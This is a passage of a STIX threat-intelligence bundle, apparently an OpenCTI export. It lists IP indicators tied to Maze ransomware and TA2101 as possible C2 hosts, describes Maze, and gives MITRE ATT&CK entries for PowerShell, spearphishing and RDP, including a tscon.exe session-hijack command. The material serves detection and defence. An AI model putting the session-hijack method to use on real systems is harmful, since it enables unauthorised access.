"id": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"type": "indicator",
"name": "91.218.114.25",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.25']",
"valid_from": "2020-02-05T10:05:15.383Z",
"valid_until": "2021-02-04T10:05:15.383Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:16.248Z",
"modified": "2020-02-05T10:05:16.248Z",
"x_opencti_id": "b00d476e-04d3-4433-9e85-b1396c25fc64",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"type": "indicator",
"name": "91.218.114.26",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.26']",
"valid_from": "2020-02-05T10:05:18.084Z",
"valid_until": "2021-02-04T10:05:18.084Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:19.186Z",
"modified": "2020-02-05T10:05:19.186Z",
"x_opencti_id": "027e5f0c-bcb5-43f3-a877-f45b3cb78caf",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"type": "indicator",
"name": "91.218.114.31",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.31']",
"valid_from": "2020-02-05T10:05:21.078Z",
"valid_until": "2021-02-04T10:05:21.078Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:22.066Z",
"modified": "2020-02-05T10:05:22.066Z",
"x_opencti_id": "fa0766e7-718a-459b-bbfd-74494abad0cc",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"type": "indicator",
"name": "91.218.114.32",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.32']",
"valid_from": "2020-02-05T10:05:23.894Z",
"valid_until": "2021-02-04T10:05:23.894Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:24.934Z",
"modified": "2020-02-05T10:05:24.934Z",
"x_opencti_id": "ca2e5139-2219-41ef-98d0-c8106ab6e0be",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"type": "indicator",
"name": "91.218.114.37",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.37']",
"valid_from": "2020-02-05T10:05:26.732Z",
"valid_until": "2021-02-04T10:05:26.732Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:27.624Z",
"modified": "2020-02-05T10:05:27.624Z",
"x_opencti_id": "a5bff540-0fcd-4c16-98db-ab257490f48c",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"type": "indicator",
"name": "91.218.114.38",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.38']",
"valid_from": "2020-02-05T10:05:29.479Z",
"valid_until": "2021-02-04T10:05:29.479Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:30.577Z",
"modified": "2020-02-05T10:05:30.577Z",
"x_opencti_id": "24b8c018-62d6-448a-a90c-22d51238d86e",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"type": "indicator",
"name": "91.218.114.4",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.4']",
"valid_from": "2020-02-05T10:05:32.391Z",
"valid_until": "2021-02-04T10:05:32.391Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:33.449Z",
"modified": "2020-02-05T10:05:33.449Z",
"x_opencti_id": "d92a768b-489d-4efa-b6f5-e0d51b5ed4b2",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"type": "indicator",
"name": "91.218.114.77",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.77']",
"valid_from": "2020-02-05T10:05:35.899Z",
"valid_until": "2021-02-04T10:05:35.899Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:36.860Z",
"modified": "2020-02-05T10:05:36.860Z",
"x_opencti_id": "f9a3c7db-da7c-49eb-9208-7e83caabb5ee",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"type": "indicator",
"name": "91.218.114.79",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.79']",
"valid_from": "2020-02-05T10:05:39.060Z",
"valid_until": "2021-02-04T10:05:39.060Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:39.947Z",
"modified": "2020-02-05T10:05:39.947Z",
"x_opencti_id": "529e8fc9-36fc-46a0-8112-c7c5b15d6558",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"type": "malware",
"name": "Maze",
"labels": [
"malware"
],
"description": "Ransomware discovered in may 2019, also know as ChaCha ransomware, and used in multiple attacks assorted with improtant ransom (millions of dollars). Maze could be distributed as a Ransomware-As-A-Service and is operated by at least one group, TA2101, specialized in Big Game Hunting attacks. Attacks with Maze often include exfitration and leak of internal datas as a mean to force victims to pay.",
"created": "2020-01-07T14:32:28.160Z",
"modified": "2020-02-04T14:23:43.027Z",
"x_opencti_id": "ad30c082-466b-4121-b175-9b90516797a2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"type": "indicator",
"name": "92.63.11.151",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.11.151']",
"valid_from": "2020-02-05T10:05:41.908Z",
"valid_until": "2021-02-04T10:05:41.909Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:43.205Z",
"modified": "2020-02-05T10:05:43.205Z",
"x_opencti_id": "8e021cff-aee9-48cf-b743-dab24853d545",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"type": "indicator",
"name": "92.63.15.56",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.56']",
"valid_from": "2020-02-05T10:05:47.546Z",
"valid_until": "2021-02-04T10:05:47.546Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:48.532Z",
"modified": "2020-02-05T10:05:48.532Z",
"x_opencti_id": "45d92f72-a4a1-43c0-88ff-802c0e44a2fa",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"type": "indicator",
"name": "92.63.15.6",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.6']",
"valid_from": "2020-02-05T10:05:50.588Z",
"valid_until": "2021-02-04T10:05:50.588Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:51.508Z",
"modified": "2020-02-05T10:05:51.508Z",
"x_opencti_id": "93e9f9fc-b19d-46b5-a177-a154adfcc626",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"type": "indicator",
"name": "92.63.15.8",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.8']",
"valid_from": "2020-02-05T10:05:53.786Z",
"valid_until": "2021-02-04T10:05:53.786Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:55.028Z",
"modified": "2020-02-05T10:05:55.028Z",
"x_opencti_id": "3a2c9e94-1de8-4abb-ab5c-5e0b7d43611d",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"type": "indicator",
"name": "92.63.17.245",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.17.245']",
"valid_from": "2020-02-05T10:05:56.992Z",
"valid_until": "2021-02-04T10:05:56.992Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:57.962Z",
"modified": "2020-02-05T10:05:57.962Z",
"x_opencti_id": "069a7607-178b-4824-b968-4bb96cfdf89a",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"type": "indicator",
"name": "92.63.194.20",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.194.20']",
"valid_from": "2020-02-05T10:06:00.260Z",
"valid_until": "2021-02-04T10:06:00.260Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:01.088Z",
"modified": "2020-02-05T10:06:01.088Z",
"x_opencti_id": "3aa96da6-a5b8-4706-a668-27ad85b35970",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"type": "indicator",
"name": "92.63.194.3",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.194.3']",
"valid_from": "2020-02-05T10:06:02.923Z",
"valid_until": "2021-02-04T10:06:02.923Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:03.797Z",
"modified": "2020-02-05T10:06:03.797Z",
"x_opencti_id": "c9831390-4675-4197-a60b-87b36fb047aa",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"type": "indicator",
"name": "92.63.29.137",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.29.137']",
"valid_from": "2020-02-05T10:06:05.618Z",
"valid_until": "2021-02-04T10:06:05.618Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:06.538Z",
"modified": "2020-02-05T10:06:06.538Z",
"x_opencti_id": "b3ee4932-cd66-4ad8-956e-3a6f3d88eaee",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"type": "indicator",
"name": "92.63.32.2",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.2']",
"valid_from": "2020-02-05T10:06:08.398Z",
"valid_until": "2021-02-04T10:06:08.398Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:09.414Z",
"modified": "2020-02-05T10:06:09.414Z",
"x_opencti_id": "b1614f93-a023-4e53-89a7-e6fb5bbcf5fe",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"type": "indicator",
"name": "92.63.32.52",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.52']",
"valid_from": "2020-02-05T10:06:11.414Z",
"valid_until": "2021-02-04T10:06:11.414Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:12.368Z",
"modified": "2020-02-05T10:06:12.368Z",
"x_opencti_id": "b9c42a28-354a-4823-ac09-d78f57f96ad3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"type": "indicator",
"name": "92.63.32.55",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.55']",
"valid_from": "2020-02-05T10:06:14.195Z",
"valid_until": "2021-02-04T10:06:14.195Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:15.189Z",
"modified": "2020-02-05T10:06:15.189Z",
"x_opencti_id": "b0249350-5f68-4650-b226-f5508fcb270d",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"type": "indicator",
"name": "92.63.32.57",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.57']",
"valid_from": "2020-02-05T10:06:17.092Z",
"valid_until": "2021-02-04T10:06:17.092Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:18.135Z",
"modified": "2020-02-05T10:06:18.135Z",
"x_opencti_id": "c7252593-79e1-465a-a398-cde1b8d192a0",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"type": "indicator",
"name": "92.63.37.100",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.37.100']",
"valid_from": "2020-02-05T10:06:20.023Z",
"valid_until": "2021-02-04T10:06:20.023Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:20.976Z",
"modified": "2020-02-05T10:06:20.976Z",
"x_opencti_id": "20442013-02a9-42ee-8b5c-f031503ed936",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"type": "indicator",
"name": "92.63.8.47",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.8.47']",
"valid_from": "2020-02-05T10:06:22.902Z",
"valid_until": "2021-02-04T10:06:22.902Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:24.154Z",
"modified": "2020-02-05T10:06:24.154Z",
"x_opencti_id": "99598776-0b84-433b-8128-3474999b4955",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "identity",
"name": "The MITRE Corporation",
"identity_class": "organization",
"labels": [
"identity"
],
"created": "2017-06-01T00:00:00.000Z",
"modified": "2017-06-01T00:00:00.000Z",
"x_opencti_organization_class": "vendor",
"x_opencti_identity_type": "organization",
"x_opencti_id": "9206a1c4-eec4-3a4a-a777-5f862e92b1d4"
},
{
"id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168",
"type": "marking-definition",
"definition_type": "statement",
"definition": {
"statement": "Copyright 2017, The MITRE Corporation"
},
"created": "2017-06-01T00:00:00.000Z",
"x_opencti_modified": "2019-04-17T11:00:42.000Z",
"x_opencti_id": "33323333-866c-355c-9a2a-bb6a8e3f447e"
},
{
"id": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"type": "attack-pattern",
"x_opencti_external_id": "T1086",
"name": "PowerShell",
"labels": [
"attack-pattern"
],
"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)",
"created": "2017-05-31T21:31:06.000Z",
"modified": "2019-12-09T18:07:24.000Z",
"x_opencti_id": "cdf8c45a-ee5d-325b-b1a5-b12899359e97",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
],
"external_references": [
{
"id": "external-reference--b61f6c85-2244-4e68-b912-dc6c98fbbed1",
"source_name": "Malware Archaeology PowerShell Cheat Sheet",
"description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.",
"url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf",
"x_opencti_id": "3b9fba73-d07d-3ba9-8760-86206515dbbd",
"x_opencti_created": "2019-04-15T17:20:32.000Z",
"x_opencti_modified": "2019-04-15T17:20:32.000Z"
},
{
"id": "external-reference--39cbcaa1-25f9-4f14-8699-189bb93cf3a0",
"source_name": "Github PowerShell Empire",
"description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.",
"url": "https://github.com/PowerShellEmpire/Empire",
"x_opencti_id": "d379e404-3053-3fee-a538-bbafcc68271b",
"x_opencti_created": "2019-04-15T17:20:32.000Z",
"x_opencti_modified": "2019-04-15T17:20:32.000Z"
},
{
"id": "external-reference--ef028ccf-a483-4f8d-b69f-321d200bf4d4",
"source_name": "Github PSAttack",
"description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.",
"url": "https://github.com/jaredhaight/PSAttack",
"x_opencti_id": "7f5d43e0-eb94-36ad-929f-8904cea070d5",
"x_opencti_created": "2019-04-15T17:20:31.000Z",
"x_opencti_modified": "2019-04-15T17:20:31.000Z"
},
{
"id": "external-reference--02893270-8079-4120-a08f-c5f1160f6eb5",
"source_name": "TechNet PowerShell",
"description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.",
"url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx",
"x_opencti_id": "016f4971-06c6-354a-8e1e-f3e970a86d70",
"x_opencti_created": "2019-04-15T17:20:30.000Z",
"x_opencti_modified": "2019-04-15T17:20:30.000Z"
},
{
"id": "external-reference--6ced85c9-c6f4-4a84-aa42-3d5f30705130",
"source_name": "FireEye PowerShell Logging 2016",
"description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.",
"url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html",
"x_opencti_id": "88a51620-db33-3646-beff-ddba139c9cbf",
"x_opencti_created": "2019-04-15T17:20:30.000Z",
"x_opencti_modified": "2019-04-15T17:20:30.000Z"
},
{
"id": "external-reference--b2360d00-b23e-43a3-9f33-828d2772b839",
"source_name": "Powersploit",
"description": "PowerSploit. (n.d.). Retrieved December 4, 2014.",
"url": "https://github.com/mattifestation/PowerSploit",
"x_opencti_id": "efb827ff-6f3c-3ab6-8afd-dc41d5b89c30",
"x_opencti_created": "2019-04-15T16:57:34.000Z",
"x_opencti_modified": "2019-04-15T16:57:34.000Z"
},
{
"id": "external-reference--27145ca7-1401-4be8-ad4b-58ca431cb299",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1086",
"external_id": "T1086",
"x_opencti_id": "af8b5897-4705-3448-bf3e-1abdb840e33e",
"x_opencti_created": "2019-04-15T17:20:29.000Z",
"x_opencti_modified": "2019-04-15T17:20:29.000Z"
},
{
"id": "external-reference--f5c8197c-c7dd-4a12-aff6-6fe2478bc2ea",
"source_name": "Sixdub PowerPick Jan 2016",
"description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.",
"url": "http://www.sixdub.net/?p=367",
"x_opencti_id": "3dd3b734-b827-47aa-a6f6-4521b68f6c42",
"x_opencti_created": "2019-10-23T14:55:23.000Z",
"x_opencti_modified": "2019-10-23T14:55:23.000Z"
},
{
"id": "external-reference--d1938bce-0690-4c60-b2f8-20e5581dc115",
"source_name": "SilentBreak Offensive PS Dec 2015",
"description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.",
"url": "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"x_opencti_id": "f6dffc2d-2905-4c80-b35f-a4462f297e05",
"x_opencti_created": "2019-10-23T14:55:23.000Z",
"x_opencti_modified": "2019-10-23T14:55:23.000Z"
},
{
"id": "external-reference--41535f62-7650-48da-81dd-79c688a2af7c",
"source_name": "Microsoft PSfromCsharp APR 2014",
"description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.",
"url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/",
"x_opencti_id": "ddcd3f16-0549-46b7-8027-8509508e40c1",
"x_opencti_created": "2019-10-23T14:55:24.000Z",
"x_opencti_modified": "2019-10-23T14:55:24.000Z"
}
]
},
{
"id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"type": "attack-pattern",
"x_opencti_external_id": "T1193",
"name": "Spearphishing Attachment",
"labels": [
"attack-pattern"
],
"description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.",
"created": "2018-04-18T17:59:24.000Z",
"modified": "2020-01-26T17:42:37.198Z",
"x_opencti_id": "d83a4231-2314-315d-abc4-6c6574257dbf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
],
"external_references": [
{
"id": "external-reference--92870416-e8a4-4877-93e8-dd8f9ca9a923",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1193",
"external_id": "T1193",
"x_opencti_id": "67647521-1c30-3567-bada-79d286d923e2",
"x_opencti_created": "2019-04-15T17:26:04.000Z",
"x_opencti_modified": "2019-04-15T17:26:04.000Z"
},
{
"id": "external-reference--b3309d2b-794e-47a7-b2b0-cf33f1472851",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/163.html",
"external_id": "CAPEC-163",
"x_opencti_id": "84ec0f8d-dda4-33b3-b687-b5e00d0ad981",
"x_opencti_created": "2019-04-15T17:26:05.000Z",
"x_opencti_modified": "2019-04-15T17:26:05.000Z"
}
]
},
{
"id": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"type": "attack-pattern",
"x_opencti_external_id": "T1076",
"name": "Remote Desktop Protocol",
"labels": [
"attack-pattern"
],
"description": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.\n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)\n\nAdversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)",
"created": "2017-05-31T21:30:59.000Z",
"modified": "2020-02-01T17:44:36.466Z",
"x_opencti_id": "6ab2aae8-dbcc-3f4d-9d80-a4b3fb7e68e4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
],
"external_references": [
{
"id": "external-reference--ef56d5f8-9518-488f-a80e-dc16ae6b5429",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1076",
"external_id": "T1076",
"x_opencti_id": "18b9aef1-da98-3e3c-94b5-1a8f2d7052c2",
